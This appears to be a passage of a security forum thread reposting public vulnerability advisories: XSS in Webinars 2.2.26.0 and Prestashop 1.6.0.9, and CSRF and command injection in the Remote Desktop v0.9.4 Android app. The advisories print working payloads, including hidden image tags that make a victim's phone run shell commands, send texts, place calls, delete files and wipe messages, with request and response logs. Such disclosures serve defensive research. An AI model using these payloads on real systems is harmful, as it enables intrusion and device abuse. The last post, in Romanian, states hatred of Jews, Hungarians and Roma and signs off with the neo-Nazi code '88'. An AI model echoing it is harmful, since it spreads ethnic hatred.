    <p>You need the latest version of the Adobe Flash Player.<p/>
    <p><a target=_blank href="https://www.adobe.com/go/getflashplayer"><img src="https://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p>
    </div>

    </object>

    </object>
    </div>
    </body>


    Reference(s):
    http://localhost:80/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT>
    http://www.xxx.com/meet/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT>
    http://webinar.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT>
    http://webinars.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT>


    Solution - Fix & Patch:
    =======================
    The vulnerability can be patched by a secure parse and encode of the vulnerable `meeting_id` value in the viewer.php file.
    Restrict the input and disallow special chars and parse the output to prevent an execution of client-side injected script codes.


    Security Risk:
    ==============
    The security risk of the client-side cross site scripting web vulnerability in the webinar conference application is estimated as medium. (CVSS 2.4)


    Credits & Authors:
    ==================
    Hadji Samir s-dz@hotmail.fr


    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
    or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
    in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
    or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
    consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
    policies, deface websites, hack into databases or trade with fraud/stolen material.

    Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
    Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
    Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
    Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
    Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
    electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
    Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
    is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
    (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Source : Webinars 2.2.26.0 Script Insertion ? Packet Storm

  6. Document Title:
    ===============
    Remote Desktop v0.9.4 Android - Multiple Vulnerabilities


    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1413


    Release Date:
    =============
    2015-01-20


    Vulnerability Laboratory ID (VL-ID):
    ====================================
    1413


    Common Vulnerability Scoring System:
    ====================================
    4.4


    Product & Service Introduction:
    ===============================
    Remote Desktop brings order to your Droid. View and retrieve all the contents of your phone such as documents, photos, videos. All you need is a
    standard web browser (! the latest Chrome or Firefox !) and Remote Desktop will allow you interact with your phone as easily as a PC.

    (Copy of the Homepage: http://remote-desktop.android.informer.com/0.9.4/ & https://play.google.com/store/apps/details?id=pl.androiddev.mobiletab )


    Abstract Advisory Information:
    ==============================
    An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Desktop v0.9.4 Android mobile web-application.


    Vulnerability Disclosure Timeline:
    ==================================
    2015-01-20: Public Disclosure (Vulnerability Laboratory)


    Discovery Status:
    =================
    Published


    Affected Product(s):
    ====================
    Damian Kolakowski
    Product: Remote Desktop - Android Mobile Web Application 0.9.4


    Exploitation Technique:
    =======================
    Remote


    Severity Level:
    ===============
    Medium


    Technical Details & Description:
    ================================
    Multiple vulnerabilities has been discovered in the Remote Desktop v0.9.4 Android mobile web-application.
    The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.

    1.1
    The local command injection vulnerability is located in `cmd` value of the `/api/sms` file. The remote attackers performs
    a client-side request and manipulates the `cmd` value to compromise the web-app by a local command injection.

    The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability
    scoring system) count of 5.5. Exploitation of the command/path inject vulnerability requires no privileged android device
    user account or user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system
    specific commands and unauthorized path value requests to compromise the mobile android application and the connected device.

    Request Method(s):
    [+] [GET]

    Vulnerable Module(s):
    [+] /api/sms

    Vulnerable Parameter(s):
    [+] cmd=%3Cform%20action=api/[x]?cmd=

    1.2
    The cross site request forgery vulnerabilities are located in the `shell`,`sms`,`calllogs` and `files` sections of the android app.
    Remote attackers are able prepare special crafted URLs that executes client-side requests to execute application functions (delete,add,
    call, send). The requst method to execute a function in a client-side request is GET.

    The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4.
    Exploitation of the client-side web vulnerability requires no privileged web-application user account but medium or high user interaction.
    Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect
    to malicious sources and client-side manipulation of affected or connected module context.

    Request Method(s):
    [+] [GET]

    Vulnerable Parameter(s):
    [+] shell
    [+] sms
    [+] calllogs


    Proof of Concept (PoC):
    =======================
    The vulnerabilities can be exploited by remote attackers without privileged application user account and with low or medium user interaction.
    For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

    [REMOTE SHELL CODE EXECUTE VULNERABILI! CSRF ]
    <img src="http://localhost:8080/api/shell?cmd=execute&command=id&token=111111111111" width="0" height="0" border="0">

    --- PoC Session Logs [GET] (Execution) ---
    GET /api/shell?cmd=execute&command=id&token=111111111111 HTTP/1.1
    Host: 192.168.1.3:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    - Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    {"response":"OK","working-directory":"\/","stderr":"","stdout":"uid=10257(u0_a257) gid=10257(u0_a257) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)\n"}



    Send SMS
    <img src="http://localhost:8080/api/sms?cmd=send&token=111111111111&to=333&message=HELLO " width="0" height="0" border="0">

    --- PoC Session Logs [GET] (Execution) ---
    GET /api/sms?cmd=send&token=111111111111&to=333&message=HELLO HTTP/1.1
    Host: 192.168.1.3:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.1.3:8080/index.html?nocache=1421469722760
    Connection: keep-alive

    - Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    {"response":"OK","results":[{"id":1590,"address":"333"}],
    "thread":{"id":51,"read":false,"snippet":"HELLO","recipients_snippet":"333",
    "message_count":70,"date":1421476972278,"recipients":[{"id":51,"address":"333"}]}}



    Call Phone

    <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0">

    --- PoC Session Logs [GET] (Execution) ---

    GET /api/calllogs?cmd=make_call&number=0674086422 HTTP/1.1
    Host: 192.168.1.3:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931
    Connection: keep-alive

    - Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    {"response":"OK"}


    Delete File
    <img src="http://localhost:8080/api/files?cmd=delete&sep=/&path=/file" width="0" height="0" border="0">

    --- PoC Session Logs [GET] (Execution) ---
    GET /api/files?cmd=delete&sep=/&path=%2Fstorage%2Femmc%2FRWDFv5.9.5.apk HTTP/1.1
    Host: 192.168.1.6:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost:8080/index.html?nocache=1421449820153
    Connection: keep-alive

    - Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    {"response":"OK"}


    Call Phone
    <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0">

    --- PoC Session Logs [GET] (Execution) ---
    GET /api/calllogs?cmd=make_call&number=11111111111 HTTP/1.1
    Host: 192.168.1.3:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost:8080/index.html?nocache=1421465315931
    Connection: keep-alive

    - Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    {"response":"OK"}


    Delete all SMS
    <img src="http://localhost:8080/api/sms?cmd=delete_all" width="0" height="0" border="0">

    GET /api/sms?cmd=delete_all HTTP/1.1
    Host: 192.168.1.3:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931
    Connection: keep-alive

    - Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    {"response":"OK"}


    LOCAL COMMAND INJECTION VULNERABILITY shell?, sms?, calllogs?files?
    --- PoC Session Logs [GET] (Execution) ---

    GET /api/sms?cmd=%3Cform%20action=api/sms?cmd=[LOCAL COMMAND INJECTION VULNERABILITY!] HTTP/1.1
    Host: 192.168.1.3:8080
    User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    - Response
    {"response":"OK"}
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8

    {"response":"Unknown command: [LOCAL COMMAND INJECTION VULNERABILITY!]"}

    Reference:
    http://localhost:8080/


    Security Risk:
    ==============
    The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)


    Credits & Authors:
    ==================
    Hadji Samir s-dz@hotmail.fr


    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
    or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
    in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
    or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
    consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
    policies, deface websites, hack into databases or trade with fraud/stolen material.

    Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
    Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
    Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
    Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
    Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
    electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
    Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
    is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
    (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Source : Remote Desktop 0.9.4 Android CSRF / Command Injection ? Packet Storm

  7. CVE-2015-1175-xss-prestashop

    Information
    ——————–
    Advisory by Octogence.
    Name: Reflected XSS Vulnerability in prestashop ecommerce software
    Affected Software : Prestashop
    Affected Versions: 1.6.0.9 and possibly below
    Vendor Homepage : https://www.prestashop.com/


    Vulnerability Type : Cross-site Scripting
    Severity : High
    CVE ID: CVE-2015-1175

    Impact
    ——
    An attacker can craft a URL with malicious JavaScript code which
    executes in the browser.

    Technical Details
    —————–
    Sample URL:

    http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300

    Parameter:
    layered_price_slider

    Sample Payload:
    <img src=a onerror=alert(1)>

    For more information on cross-site scripting vulnerabilities read the
    following article:

    https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

    Advisory Timeline (mm/dd/yyyy)
    ——————–
    01/07/2015 – Reported
    01/12/2015 – Vulnerability Fixed
    01/18/2015 – Advisory Released

    http://octogence.com/advisories/cve-2015-1175-xss-prestashop/




    Regards
    Sudhanshu

    Octogence Tech Solutions
    Noida, India
    Mobile | +91-9971658929
    Website| www.octogence.com

    Source : Prestashop 1.6.0.9 Cross Site Scripting ? Packet Storm

    • Upvote 1
  8. Salut, numele meu este Mihai am 20 de ani, sunt din Bucuresti , cunostiintele mele in domeniul IT sunt bunicele ( cate putine din toate)

    Nu suport evreii,unguri si tigani.

    88

    • Upvote 1
×
×
  • Create New...